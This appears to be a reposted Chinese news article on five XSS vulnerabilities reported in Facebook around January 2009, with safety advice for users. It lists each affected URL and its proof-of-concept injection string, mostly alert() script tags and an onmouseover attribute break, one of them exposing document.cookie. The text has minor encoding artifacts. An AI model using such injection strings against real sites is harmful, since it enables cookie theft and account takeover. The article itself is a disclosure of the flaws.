近期，F(xiàn)acebook驚現(xiàn)高危XSS安全漏洞，致使其用戶遭受巨大威脅。本文將對(duì)這些漏洞發(fā)布進(jìn)行詳細(xì)介紹。
Facebook在2008年12月15日與2009年1月4日被曝出一系列高危XSS安全漏洞，F(xiàn)acebook眾多的功能同時(shí)遭受牽連，如新用戶注冊(cè)、iPhone登錄、密碼重新設(shè)定，等等。

攻擊者能夠利用這些XSS漏洞攻擊數(shù)以百萬(wàn)計(jì)的Facebook用戶，例如散播惡意軟件、廣告軟件和間諜軟件等等。拜這些高危跨站點(diǎn)腳本攻擊漏洞所賜，F(xiàn)acebook用戶可能受到釣魚攻擊并導(dǎo)致ID失竊。截至本月5號(hào)為止，這些漏洞尚未得到修復(fù)，這些高危漏洞已經(jīng)對(duì)用戶的隱私構(gòu)成了高度的威脅。

安全研究人員最近發(fā)現(xiàn)的有XSS漏洞的頁(yè)面包括，開發(fā)人員頁(yè)面、新用戶注冊(cè)頁(yè)面、iphone登錄頁(yè)面以及應(yīng)用程序頁(yè)面。攻擊者能夠利用這些XSS漏洞攻擊數(shù)以百萬(wàn)計(jì)的Facebook用戶，例如散播惡意軟件、廣告軟件和間諜軟件等等。對(duì)于用戶來(lái)說(shuō)，為了遠(yuǎn)離這些威脅的攻擊最好不要接受不認(rèn)識(shí)的人員加為好友的請(qǐng)求，千萬(wàn)不要點(diǎn)擊不明來(lái)源的鏈接。

原因是Facebook的個(gè)人概況中包含了許多個(gè)人信息，“好友”通過(guò)則這些信息足以發(fā)動(dòng)有針對(duì)性的釣魚攻擊，或者向您發(fā)送有針對(duì)性的垃圾郵件。但是如果您點(diǎn)擊了一個(gè)共享鏈接結(jié)果會(huì)怎樣呢？很明顯，對(duì)他們來(lái)說(shuō)，您就不會(huì)有什么隱私了�。�！為了安全和隱私起見，一定要注意您在社交網(wǎng)絡(luò)上的個(gè)人簡(jiǎn)介。

下面我們對(duì)這些最新漏洞分析進(jìn)行介紹：

1號(hào)XSS漏洞：

所在位置：http://www.new.facebook.com/r.php
問(wèn)題頁(yè)面的鏡像：http://www.xssed.com/mirror/50947/
攻擊性POST：reg_email__="onmouseover="alert('XSS - ZJ')"foo="bar

2號(hào)XSS漏洞

所在位置：
https://login.facebook.com/login.php?iphone&next=http%3A%2F%2Fiphone.facebook.com%2F
問(wèn)題頁(yè)面的鏡像：http://www.xssed.com/mirror/53885/
攻擊性POST：
email=biz%22%3E%3Cscript%3Ealert%28%27tohellwithgeorgia%27%29%3C%2Fscript%3E%3C%22&pass=greetz2evilghost&next=http%3A%2F%2Fiphone.facebook.com%2F&login=Login

3號(hào)XSS漏洞

所在位置及攻擊字符串：
http://apps.facebook.com/blognetworks/searchpage.php?tag=%22%3E%3Cscript%3Ealert(%22DaiMon%22)%3C/script%3E
問(wèn)題頁(yè)面的鏡像：http://www.xssed.com/mirror/55268/

4號(hào)XSS漏洞：

所在位置：http://developers.facebook.com/tools.php?fbml
問(wèn)題頁(yè)面的鏡像：http://www.xssed.com/mirror/55392/
攻擊性POST：
profile=1299125444&position=wide&api_key=%27%22%3E%3C%2Ftitle%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+p3lo%3C%2Fh1%3E%3C%2Fmarquee%3E+&fbml=
Hey you all! Our best wishes for 2009!!! :) ;)

5號(hào)XSS漏洞：

這是Facebook的Reset Password頁(yè)面近期再次出現(xiàn)危險(xiǎn)的跨站點(diǎn)腳本攻擊安全漏洞。惡意用戶可以網(wǎng)其中諸如代碼并竊取數(shù)以百萬(wàn)計(jì)的Facebook用戶的敏感個(gè)人信息。但愿這個(gè)漏洞能夠得到迅速修復(fù)，好在以前他們的反應(yīng)還是很迅速的。

所在位置：
http://www.facebook.com/reset.php?locale=en_GB%22%3E%3Cscript%3Ealert(1)%3C/script%3E%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

問(wèn)題頁(yè)面的鏡像：
http://www.xssed.com/mirror/55951/

快照：

 
圖1

標(biāo)簽： seo 安全 代碼 腳本 漏洞 網(wǎng)絡(luò)

版權(quán)申明：本站文章部分自網(wǎng)絡(luò)，如有侵權(quán)，請(qǐng)聯(lián)系：west999com@outlook.com
特別注意：本站所有轉(zhuǎn)載文章言論不代表本站觀點(diǎn)！
本站所提供的圖片等素材，版權(quán)歸原作者所有，如需使用，請(qǐng)與原作者聯(lián)系。